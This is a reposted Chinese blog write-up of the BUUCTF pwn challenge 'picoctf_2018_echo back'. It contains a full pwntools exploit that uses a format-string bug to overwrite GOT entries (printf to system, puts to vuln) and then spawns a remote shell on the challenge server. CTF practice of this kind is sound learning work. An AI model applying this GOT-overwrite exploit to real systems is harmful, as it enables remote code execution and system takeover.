[BUUCTF-pwn]——picoctf_2018_echo back
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——picoctf_2018_echo back
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——picoctf_2018_echo back
和之前的一道題及其類似大家可以對比一下[BUUCTF-pwn]——ciscn_2019_sw_1
思路都是一樣的就是將printf_got修改為system_plt表,然后循環調用就好
找偏移, 為7
不過有點難受的是, 不知道為什么利用fini_array不行,那里錯了也不知道,沒辦法只有利用put的got表了。
exploit
from pwn import* p=remote('node3.buuoj.cn',27945) #p = process('./PicoCTF_2018_echo_back') #gdb.attach(p, 'b printf') printf_got = 0x0804A010 sys_plt = 0x08048460 puts_got = 0x0804A01C vuln = 0x080485AB fini = 0x08049F0C offset = 7payload = p32(puts_got + 2) + p32(printf_got+2) + p32(printf_got) + p32(puts_got) payload += '%' + str(0x0804 - 0x10) + 'c%7$hn' payload += '%8$hn' payload += '%' + str(0x8460 - 0x0804) + 'c%9$hn' payload += '%' + str(0x85AB - 0x8460) + 'c%10$hn'p.recvuntil('message:\n') p.send(payload)p.recvuntil('message:\n') p.sendline('/bin/sh\x00')p.interactive() 與50位技術專家面對面20年技術見證,附贈技術全景圖總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_echo back的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——hgame2
- 下一篇: 汇编转跳指令 (J开头的)